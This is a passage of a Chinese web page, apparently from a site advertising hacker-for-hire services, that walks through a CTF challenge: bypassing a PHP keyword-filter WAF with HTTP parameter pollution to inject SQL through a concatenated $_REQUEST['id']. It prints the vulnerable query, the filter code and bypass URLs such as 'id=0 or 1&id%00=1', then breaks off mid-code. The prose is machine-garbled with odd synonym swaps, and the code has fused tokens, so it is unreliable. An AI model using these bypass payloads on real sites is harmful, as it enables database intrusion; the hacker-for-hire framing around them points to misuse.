PHP的两个特性导致waf绕过注入

访客5年前黑客工具575

1、HPP HTTP参数污染
HTTP参数污染指的是,在URL中提交相同键值的两个参数时,服务器端一般会进行一些处理。比方Apache就要以最终一个参数为准,比方:
user.php?id=111&id=222
假如输出$_GET数组,则id的值只会取222,即URL上提交的多余值覆盖了前一个值。
2、一个CTF标题
关于注入的waf绕过,注入点为:
$sql="select * from user where id=".$_REQUEST["id"].";";
能够看到了REQUEST进行传递,而且存在如下的waf代码:
    functionwaf($str) { 
        if(stripos($str,"select")!==false) 
            die("Be a good person!"); 
        if(stripos($str,"union")!==false) 
            die("Be a good person!"); 
        ...... 
    }   
      
    functionwafArr($arr) { 
        foreach($arras$k=> $v) { 
            waf($k); 
            waf($v); 
        } 
    }   
      
    wafArr($_GET); 
    wafArr($_POST); 
    wafArr($_COOKIE); 
    wafArr($_SESSION);  
      
    functionstripStr($str) { 
        if(get_magic_quotes_gpc()) 
            $str= stripslashes($str); 
        returnaddslashes(htmlspecialchars($str, ENT_QUOTES, 'UTF-8')); 
    }   
      
    $uri= explode("?",$_SERVER['REQUEST_URI']); 
    if(isset($uri[1])) { 
        $parameter= explode("&",$uri[1]); 
        foreach($parameteras$k=> $v) { 
            $v1= explode("=",$v); 
            if(isset($v1[1])) { 
                $_REQUEST[$v1[0]] = stripStr($v1[1]); 
            } 
        } 
    }   
      
    functionstripArr($arr) { 
        $new_arr= array(); 
        foreach($arras$k=> $v) { 
            $new_arr[stripStr($k)] = stripStr($v); 
        } 
        return$new_arr; 
    }   
      
    $_GET=stripArr($_GET); 
    $_POST=stripArr($_POST); 
    $_COOKIE=stripArr($_COOKIE); 
    $_SESSION=stripArr($_SESSION);
这儿运用了waf函数分别对GET POST SESSION COOKIE数据进行过滤,而且对这些大局数组进行转义。
值得注意的是,这儿的$_REQUEST是代码中从头依据$_SERVER[‘REQUEST_URI’]进行拼接,在拼接过程中将参数值进行转义操作。
(1)思路1  运用HPP特性
看似不太可能存在注入,可是运用HPP能够完成。
示例代码:
user.php?id=0 or 1&id%00=1 
user.php?id=0 or 1&%20id=1 
user.php?id=0 or 1?&id=1
测验代码:
      
    function stripArr($arr) { 
        $new_arr = array(); 
        foreach ($arr as $k => $v) { 
            $new_arr[stripStr($k)] = stripStr($v); 
        } 
        return $new_arr; 
    } 
     
    function stripStr($str) { 
        if (get_magic_quotes_gpc()) 

[1] [2]  黑客接单网

相关文章

网易云音乐PC客户端加密API逆向解析

1、前语 网上现已有许多的web端接口解析的办法了,可是对客户端的接口解析基本上找不到什么材料,本文首要剖析网易云音乐PC客户端的API接口交互方法。 经过内部的署理设置,运用fiddler作为署理东...

揭秘使用Confluence未授权RCE漏洞在6小时内黑掉50+公司-黑客接单平台

长话短说,其实早在2019年我就创建了我的Hackerone/Bugcrowd profiles,但我从未在那里陈述过任何的缝隙。这是第一个让我觉得值得陈述的缝隙,也打破了我多年来零陈述的记载。 安全...

TrickBot银行木马归来突击全球金融机构

一、布景 最近国外安全研究人员发现TrickBot银行木马最新的样本,深服气EDR安全团队对此事进行了相关跟进,获取到了相应的样本,并对样本进行了详细剖析,承认此样本为TrickBot银行盗号木马的最...

黑客接单:ddos网络攻击的威力

今年6月,美国的一次网络攻击破坏了伊斯兰革命卫队使用的一个关键数据库。   根据美国高级官员的说法,6月份针对伊朗的秘密网络攻击摧毁了伊朗准军事部门使用的一个关键数据库,该数据库和伊朗策划...

几个不错且免费的Web安全解决方案

朋友:有什么的免费的网站安全解决方案,或者说产品么? 黑客接单渠道:当然有啊!不光免费,还很好用呢! 朋友:那还不赶忙和我说说?我小网站买不起WAF,免费的好用的话我就用下啊! 黑客接单渠道:那等下,...

高校SQL注入防治扼要计划

 1、避免SQL注入的动机 近来教育职业的信息安全问题真是一波未平一波又起:连续发作多个高校网站体系被更改,影响恶劣;高校密布被爆SQL注入缝隙,触及80%以上的高校;教育职业成为电信欺诈的重灾区,据...